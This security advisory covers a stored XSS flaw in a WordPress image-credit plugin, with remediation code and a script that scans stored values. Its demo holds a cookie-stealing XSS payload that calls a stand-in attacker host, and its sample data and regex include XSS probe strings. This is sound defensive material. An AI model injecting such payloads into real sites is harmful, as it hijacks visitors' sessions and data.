Image Source Control Lite – Show Image Credits and Captions Plugin Vulnerability (CVE-2026-4852)


Security Alert Summary

The Image Source Control Lite – Show Image Credits and Captions plugin for WordPress is vulnerable to stored cross-site scripting (XSS) via the ‘Image Source’ attachment field in all versions up to and including 3.9.1. Authenticated attackers with Author-level access and above can store script in that field, and it executes in the browser of any user who views a page on which the field is rendered.


CVE Details

  • CVE ID: CVE-2026-4852
  • Affected plugin or component: Image Source Control Lite – Show Image Credits and Captions
  • Affected versions: All versions up to and including 3.9.1
  • Published: April 20, 2026 at 9:16:36 PM UTC
  • Last modified: April 20, 2026 at 9:16:36 PM UTC
  • CVSS v3.1: Base Score 6.4 (MEDIUM) – CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
  • Authentication / Privileges / User Interaction: Authentication required: yes (Author-level or higher, per description). Privileges Required: LOW. User Interaction: NONE. Scope: CHANGED.
  • Primary impact: Confidentiality: LOW; Integrity: LOW; Availability: NONE
  • Weakness: CWE-79 (Cross-site Scripting)

Technical Details

The vulnerability is a stored XSS caused by insufficient input sanitization and missing output escaping of the ‘Image Source’ attachment field. An attacker with Author-level privileges can store script content in that field; the value is then written into the HTML of every page where the field is displayed. Author is the threshold because Authors hold the upload_files capability and can edit the fields of their own attachments, whereas Contributors cannot upload media by default.

The referenced code location is the plugin view public/views/global-list.php, by its name the template for the plugin's global list of image sources, and it is where the stored value is emitted without escaping. The view lives under the plugin's public output, so the victim can be anyone who loads a page that renders that list. The injected script runs in the site's origin with the viewing user's session, which is why the CVSS vector marks Scope as Changed: the vulnerable component is the plugin, but the impact lands in the viewer's browser.

The practical impact follows the reported CVSS effects: limited confidentiality and integrity impact (for example, reading data the viewing user can see, or altering rendered page content and issuing requests with that user's session) and no reported availability impact.
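The pattern behind the finding, as an added PHP example that is not the plugin's code: a stored attachment field echoed into list markup unescaped, next to the hardened version that sanitizes on save and escapes on output. The meta key isc_image_source, the field name and the list markup are assumptions made for the example; the filter name attachment_fields_to_save and its ( $post, $attachment ) signature are WordPress's own. Small stand-ins for esc_html() and sanitize_text_field() are included only so the file also runs outside WordPress.

```php
<?php
/**
 * Added example, not code from the Image Source Control plugin. It places the
 * vulnerable pattern (a stored attachment field echoed into the list markup
 * unescaped) next to the hardened one (sanitize on save, escape on output).
 * Assumptions: the meta key 'isc_image_source', the field name used in the
 * media modal, and the <li> markup. The filter 'attachment_fields_to_save'
 * and its ( $post, $attachment ) signature are WordPress's own.
 *
 * Stand-ins so the file also runs outside WordPress (php isc-example.php);
 * inside WordPress the real functions are used instead.
 */
if ( ! function_exists( 'esc_html' ) ) {
    function esc_html( $text ) {
        return htmlspecialchars( (string) $text, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8' );
    }
}
if ( ! function_exists( 'sanitize_text_field' ) ) {
    // Approximation of WordPress's sanitize_text_field(): drop script/style
    // blocks with their contents, strip remaining tags and control characters.
    function sanitize_text_field( $str ) {
        $str = preg_replace( '@<(script|style)[^>]*?>.*?</\1>@si', '', (string) $str );
        $str = strip_tags( $str );
        $str = preg_replace( '/[\x00-\x1F\x7F]/', '', $str );
        return trim( $str );
    }
}

const ISC_EXAMPLE_META_KEY = 'isc_image_source'; // assumed meta key

// VULNERABLE: the stored value is printed straight into the list markup, so a
// value like 'Jane Doe <script>...</script>' becomes live script for every viewer.
function isc_example_render_vulnerable( string $stored_source ): string {
    return '<li class="isc-source">' . $stored_source . '</li>';
}

// HARDENED, output side: escape at the point of output regardless of what
// happened on save; other code paths (imports, direct DB writes) can also
// populate the meta value.
function isc_example_render_escaped( string $stored_source ): string {
    return '<li class="isc-source">' . esc_html( $stored_source ) . '</li>';
}

// HARDENED, input side: sanitize in the attachment_fields_to_save handler.
function isc_example_save_field( array $post, array $attachment ): array {
    if ( isset( $attachment[ ISC_EXAMPLE_META_KEY ] ) ) {
        $clean = sanitize_text_field( $attachment[ ISC_EXAMPLE_META_KEY ] );
        if ( function_exists( 'update_post_meta' ) ) {
            update_post_meta( (int) $post['ID'], ISC_EXAMPLE_META_KEY, $clean );
        }
        $post['isc_example_clean'] = $clean; // returned so the stand-alone demo can show it
    }
    return $post;
}

if ( function_exists( 'add_filter' ) ) {
    add_filter( 'attachment_fields_to_save', 'isc_example_save_field', 10, 2 );
} else {
    // Stand-alone demo with a constructed payload of the kind an Author could submit.
    $payload = 'Jane Doe <script>fetch("https://attacker.example/?c=" + document.cookie)</script>';
    echo 'Vulnerable: ', isc_example_render_vulnerable( $payload ), "\n";
    echo 'Escaped:    ', isc_example_render_escaped( $payload ), "\n";
    $saved = isc_example_save_field( array( 'ID' => 123 ), array( ISC_EXAMPLE_META_KEY => $payload ) );
    echo 'Sanitized:  ', $saved['isc_example_clean'], "\n";
}
```

The output-side fix is the one that closes the hole: input sanitization can be bypassed by any other writer of the meta value, while esc_html() at the echo site neutralizes whatever is stored. If the field is meant to carry a link to the source, the equivalent is wp_kses() with an explicit allow-list rather than echoing raw HTML.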


How This Could Impact Your Website

Example scenario: an external contractor or contributor with Author-level access adds or edits an image attachment and injects a script into the ‘Image Source’ field. When an internal editor or the site owner views the gallery or page that lists that attachment, the injected script runs in their browser. This could expose information visible to that user (such as internal email addresses displayed in the interface) or alter displayed content, increasing the risk of targeted phishing or social engineering. If the viewer is an administrator, the script runs with that administrator's logged-in session and can make requests to the site on their behalf.

If you’re unsure whether your site is affected or how to assess your current user roles and plugins, it may be worth having a professional review your setup.


Recommended Actions

  • Update the affected plugin as soon as a patched version (later than 3.9.1) is available.
  • Review and reduce unnecessary user roles. Author is enough for this issue because Authors can upload media and edit their own attachments' fields; grant that role only to people who need it, and keep outside contractors at Contributor where possible.
  • Enforce strong passwords and two-factor authentication for editors and administrators.
  • Remove unused or unmaintained plugins.
  • Review the stored ‘Image Source’ values of existing attachments for HTML or script markup: a plugin update changes how the field is rendered, but whatever is already stored in the field stays in the database until you look at it.
  • Monitor site activity and logs for unusual behavior, such as unexpected content changes or unfamiliar user actions.
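A concrete check for the stored values, added here as an example script and not part of the plugin or the advisory: run inside the site root with WP-CLI as wp eval-file isc-scan.php, it lists every attachment whose stored ‘Image Source’ value contains a tag, an inline event handler or a javascript: URL, together with the author ID, so the accounts involved can be reviewed. It assumes the plugin stores the field in post meta under the key isc_image_source; confirm that against the plugin's own code. Run outside WordPress it checks constructed sample rows instead.

```php
<?php
/**
 * Added example, not part of the plugin or this advisory: a WP-CLI script that
 * lists attachments whose stored 'Image Source' value contains markup, so the
 * values Authors have saved can be reviewed. Run inside the site root with
 *   wp eval-file isc-scan.php
 * Assumption: the plugin stores the field in post meta under 'isc_image_source';
 * confirm the key against the plugin's code and adjust if it differs.
 * Run outside WordPress (php isc-scan.php) it checks constructed sample rows.
 */
const ISC_SCAN_META_KEY = 'isc_image_source'; // assumed meta key

// A legitimate credit is plain text ("Photo: Jane Doe"). Anything that opens a
// tag, carries an inline event handler, or uses a javascript: URL deserves a look.
function isc_scan_looks_like_markup( string $value ): bool {
    return (bool) preg_match( '/<\s*[a-z!\/]|\bon[a-z]+\s*=|javascript\s*:/i', $value );
}

// Filter rows of the shape ['ID' => int, 'post_author' => int, 'meta_value' => string].
function isc_scan_find_suspicious( array $rows ): array {
    return array_values( array_filter( $rows, function ( array $row ): bool {
        return isc_scan_looks_like_markup( (string) $row['meta_value'] );
    } ) );
}

if ( function_exists( 'add_filter' ) ) {
    // Inside WordPress (wp eval-file): pull every attachment's stored value.
    global $wpdb;
    $rows = $wpdb->get_results( $wpdb->prepare(
        "SELECT p.ID, p.post_author, pm.meta_value
           FROM {$wpdb->posts} p
           JOIN {$wpdb->postmeta} pm ON pm.post_id = p.ID
          WHERE p.post_type = 'attachment' AND pm.meta_key = %s",
        ISC_SCAN_META_KEY
    ), ARRAY_A );
} else {
    // Constructed sample rows for running the script outside WordPress.
    $rows = array(
        array( 'ID' => 101, 'post_author' => 4, 'meta_value' => 'Photo: Jane Doe / Unsplash' ),
        array( 'ID' => 102, 'post_author' => 7, 'meta_value' => 'Credit <img src=x onerror=alert(document.domain)>' ),
        array( 'ID' => 103, 'post_author' => 7, 'meta_value' => '<a href="javascript:alert(1)">source</a>' ),
        array( 'ID' => 104, 'post_author' => 4, 'meta_value' => 'Screenshot by the editorial team' ),
    );
}

$hits = isc_scan_find_suspicious( $rows );
printf( "Checked %d attachment(s); %d suspicious.\n", count( $rows ), count( $hits ) );
foreach ( $hits as $row ) {
    // Author IDs tell you which accounts to review; control characters are
    // escaped so a crafted value cannot play tricks with the terminal.
    printf( "attachment %d (author %d): %s\n", $row['ID'], $row['post_author'],
        addcslashes( (string) $row['meta_value'], "\0..\37" ) );
}
```

On the constructed rows the script reports two suspicious attachments, both saved by author 7. On a live site, treat a hit as a lead rather than proof: check the value in the media library, look at who saved it and when, and clean it up after the plugin has been updated.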

If you’d like help reviewing your plugins, user roles, or overall WordPress security posture, our team at Freshy is happy to help.

